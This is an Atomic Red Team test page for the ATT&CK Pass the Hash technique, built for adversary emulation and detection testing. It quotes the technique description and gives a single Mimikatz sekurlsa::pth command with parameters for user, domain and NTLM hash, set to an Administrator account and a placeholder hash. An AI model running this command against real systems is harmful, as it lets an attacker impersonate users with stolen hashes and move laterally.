CircleCI Atomic Red Team doc generator
36 lines
1.5 KiB
Markdown
36 lines
1.5 KiB
Markdown
# T1075 - Pass the Hash
|
|
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1075)
|
|
<blockquote>Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
|
|
|
|
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Mimikatz Pass the Hash
|
|
Note: must dump hashes first
|
|
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| user_name | username | string | Administrator|
|
|
| domain | domain | string | atomic.local|
|
|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
|
|
|
|
#### Run it with `command_prompt`!
|
|
```
|
|
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|